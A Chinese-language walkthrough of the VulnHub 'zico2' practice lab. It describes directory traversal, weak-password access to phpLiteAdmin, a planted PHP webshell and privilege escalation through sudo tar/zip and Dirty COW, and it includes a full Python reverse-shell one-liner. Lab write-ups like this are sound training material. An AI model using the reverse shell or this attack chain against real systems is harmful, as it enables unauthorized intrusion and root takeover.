vulnhub靶机 zico2
靶机介绍
官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/
目标是获取root的目录下的flag,难度是中级
运行环境:
靶机:网络设为NAT模式,IP地址为:192.168.174.133
攻击机:同网段下的kali Linux,IP地址为:192.168.174.128
运行靶机
开始渗透
获取IP地址
扫描端口
访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含
使用工具扫描发现确实存在目录遍历的漏洞,并且已经给出了攻击细节
成功包含passwd文件
扫一下目录
在dbadmin目录访问test_db.php发现是一个phpliteadmin管理系统,并且使用弱密码admin登录成功
phpliteadmin <=1.9.3版本是存在远程php代码执行漏洞
参考链接:https://www.exploit-db.com/exploits/24044
创建一个cmd.php数据库
在cmd.php数据库里面创建任意一张表
内容写成一句话,由于对单引号做了过滤所以一句话里面不要加单引号
返回view.php包含cmd.php
使用pyhton来反弹shell,需要将代码使用URL编码
1 | 源码:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.174.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
开启监听,执行代码
监听成功,使用python打开终端
再zico的家目录下找到了wordpress框架,并且再wordpress的配置文件当中找到了zico用户的密码
切换到zico用户
接下来就是提权到root了,提权的方法有很多
第一个方法使用sudo -l查看zico用户在tar和zip的用户组里面
使用工具查看zip的提权命令
也可以参考:https://www.freebuf.com/articles/system/206007.html
成功提权到root
使用工具查看tar的提权命令
成功提权到root
使用脚本来提权
参考链接:https://www.exploit-db.com/download/33589
使用33589脚本提权,可能是靶机与物理机的CPU不兼容所有会出现报错
换成dirty脚本就可以成功提权
下载地址:https://github.com/FireFart/dirtycow
由于靶机不能使用gcc所以使用kali攻击机将脚本编译
开始临时的HTTP服务将编译好的exp下载到靶机tmp目录下 因为在tmp目录下zico用户权限较高
赋予exp一个可执行的权限,将exp执行 jianhao是密码是可以更改的随便什么都可以不能为空
切换到xjh用户,可以看到xjh用户拥有root权限,切换root目录,成功找到flag
还有一种方法可以是使用find提权,有些麻烦其中也用到了tar
参考:https://hackingresources.com/zico2-vulnhub-walkthrough/
1 | 某位大神的笔记 |
zico2这个靶机到这里就结束了,提权的方法有很多,